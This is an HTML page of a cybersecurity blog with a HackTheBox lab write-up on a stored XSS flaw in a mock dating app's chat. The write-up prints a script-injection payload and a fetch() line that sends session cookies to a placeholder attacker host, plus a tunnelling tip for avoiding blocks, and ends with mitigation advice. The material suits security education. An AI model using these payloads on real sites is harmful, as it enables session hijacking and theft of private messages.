<!doctype html>
<html lang="en">
  <head>
    <title>OnlyHacks // Cyber security blog</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="blackcaesar0" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.4566c05e79be04e22fdb60fe026660a374366519139306a7223d2cab6fb660db.css" />
    
    <link rel="stylesheet" href="/css/custom.min.5af53ff6a9267e24ee96c3f1312dd379808c5a82b25f008d9e402843955e4f21.css" />
    

    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="OnlyHacks">
  <meta name="twitter:description" content="Overview A cross-site scripting (XSS) vulnerability was discovered in a dating web application (similar to Tinder) where users chat after matching. The flaw is located in the chat endpoint, which fails to properly sanitize inputs. This allowed the injection of an external JavaScript file to steal session cookies, read user chats, and even retrieve a sensitive flag from direct messages (DMs).
Vulnerability Description The vulnerability occurs when an attacker injects a malicious payload. Once executed in the victim’s browser, the payload sends the user’s session cookie to an attacker-controlled server. With the stolen cookie, the attacker can hijack the session, access private chats, and extract sensitive data.">

    <meta property="og:url" content="https://blackcaesar0.com/hackthebox/onlyhacks/">
  <meta property="og:site_name" content="Cyber security blog">
  <meta property="og:title" content="OnlyHacks">
  <meta property="og:description" content="Overview A cross-site scripting (XSS) vulnerability was discovered in a dating web application (similar to Tinder) where users chat after matching. The flaw is located in the chat endpoint, which fails to properly sanitize inputs. This allowed the injection of an external JavaScript file to steal session cookies, read user chats, and even retrieve a sensitive flag from direct messages (DMs).
Vulnerability Description The vulnerability occurs when an attacker injects a malicious payload. Once executed in the victim’s browser, the payload sends the user’s session cookie to an attacker-controlled server. With the stolen cookie, the attacker can hijack the session, access private chats, and extract sensitive data.">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="hackthebox">
    <meta property="article:published_time" content="2025-02-17T15:41:14+01:00">
    <meta property="article:modified_time" content="2025-02-17T15:41:14+01:00">


  </head>
  <body>
    <header class="app-header">
      <a href="/"><img class="app-header-avatar" src="/dragon.png" alt="blackcaesar0" /></a>
      <span class="app-header-title">blackcaesar0</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
             - 
          
          <a class="app-header-menu-item" href="/hackthebox/">Hackthebox</a>
      </nav>
      <p>Exploring cybersecurity, ethical hacking, and digital forensics—one exploit at a time.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-github" viewBox="0 0 24 24" fill="currentColor"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
          </a>
        
          <a href="https://www.linkedin.com/in/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-linkedin" viewBox="0 0 24 24" fill="currentColor"><title>LinkedIn</title><path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433c-1.144 0-2.063-.926-2.063-2.065 0-1.138.92-2.063 2.063-2.063 1.14 0 2.064.925 2.064 2.063 0 1.139-.925 2.065-2.064 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z"/></svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">OnlyHacks</h1>
      <div class="post-meta">
        <div>
          <svg class="icon icon-calendar" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>calendar</title><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>
          Feb 17, 2025
        </div>
        <div>
          <svg class="icon icon-clock" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>clock</title><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
          2 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h2 id="overview">Overview</h2>
<p>A cross-site scripting (XSS) vulnerability was discovered in a dating web application (similar to Tinder) where users chat after matching. The flaw is located in the chat endpoint, which fails to properly sanitize inputs. This allowed the injection of an external JavaScript file to steal session cookies, read user chats, and even retrieve a sensitive flag from direct messages (DMs).</p>
<h2 id="vulnerability-description">Vulnerability Description</h2>
<p>The vulnerability occurs when an attacker injects a malicious payload. Once executed in the victim&rsquo;s browser, the payload sends the user&rsquo;s session cookie to an attacker-controlled server. With the stolen cookie, the attacker can hijack the session, access private chats, and extract sensitive data.</p>
<h2 id="proof-of-concept-poc">Proof of Concept (PoC)</h2>
<h3 id="1-external-script-injection">1. External Script Injection</h3>
<p>Inject the following code into the vulnerable endpoint:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://your_public_url:43451/test.js&#34;</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</span></span></code></pre></div><h3 id="2-cookie-exfiltration-payload">2. Cookie Exfiltration Payload</h3>
<p>The external JavaScript file (<code>test.js</code>) contains the following payload:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#a6e22e">fetch</span>(<span style="color:#e6db74">&#39;http://your_public_url:43451/log?cookie=&#39;</span> <span style="color:#f92672">+</span> document.<span style="color:#a6e22e">cookie</span>);
</span></span></code></pre></div><p><strong>Tip</strong>: If the tester is using Ngrok or Pinggy, they should use a TCP tunnel instead of an HTTP tunnel to avoid potential security mechanisms blocking requests.</p>
<h2 id="poc">POC</h2>
<p><img src="/static/XSS_enum.png" alt="PoC Screenshot 1">
<img src="/static/cookie.png" alt="PoC Screenshot 2">
<img src="/static/flag.png" alt="PoC Screenshot 3"></p>
<h2 id="impact">Impact</h2>
<ul>
<li><strong>Session Hijacking:</strong> The attack successfully stole a user’s session cookie.</li>
<li><strong>Unauthorized Data Access:</strong> The stolen cookie allowed access to the victim’s chat messages.</li>
<li><strong>Sensitive Information Disclosure:</strong> A flag was retrieved from the victim&rsquo;s direct messages (DMs).</li>
</ul>
<p>These impacts highlight the risk of unauthorized access and potential data breaches resulting from XSS vulnerabilities.</p>
<h2 id="recommendations">Recommendations</h2>
<p>To mitigate this vulnerability, consider the following steps:</p>
<ol>
<li><strong>Input Sanitization:</strong> Ensure that all user inputs are properly sanitized to prevent script injection.</li>
<li><strong>Content Security Policy (CSP):</strong> Implement a strict CSP to restrict the execution of untrusted scripts.</li>
<li><strong>Cookie Security:</strong> Use HttpOnly and Secure flags on cookies to prevent JavaScript access.</li>
<li><strong>Regular Security Audits:</strong> Conduct periodic security testing and code reviews to identify and fix vulnerabilities.</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p>This XSS vulnerability underscores the importance of robust input validation and secure coding practices. Implementing the recommended measures can significantly reduce the risk of similar attacks and protect user data.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
